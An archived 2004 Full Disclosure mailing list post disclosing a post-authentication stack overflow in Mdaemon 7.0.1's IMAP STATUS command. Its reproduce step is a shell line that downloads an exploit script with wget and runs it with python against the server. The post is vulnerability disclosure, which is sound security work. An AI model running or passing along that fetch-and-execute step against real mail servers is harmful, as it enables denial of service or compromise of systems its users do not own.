Full Disclosure mailing list archives
Mdaemon 7.0.1 IMAP overflow.
From: ned <nd () felinemenace org>
Date: Tue, 11 May 2004 22:26:13 -0700 (PDT)
Let it be known that this bug is after authentication ("postauth") and therefore useless. In the current version of Mdaemon from ALTN there exists an easy to exploit, run-of-the-mill stack overflow. By authenticating and sending a large argument to the STATUS command in the IMAP component, a buffer will be overflown, and a access violation will be caused. To reproduce: cd SMUDGE;wget http://felinemenace.org/~nd/SMUDGE/Mdaemon/Mdaemon7.0.1Stack.py; python Mdaemon7.0.0.1Stack.py. Change the user and password first. Thanks to: - Dave Aitel for his neet spike scripts which convert to SMUDGE scripts quite easily :) - rootkit.com Not sure if the vendor knows about it. Thanks, nd ps: second public release from the UBC, we have to make space for the new vulns :) -- http://felinemenace.org/~nd _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Mdaemon 7.0.1 IMAP overflow. ned (May 11)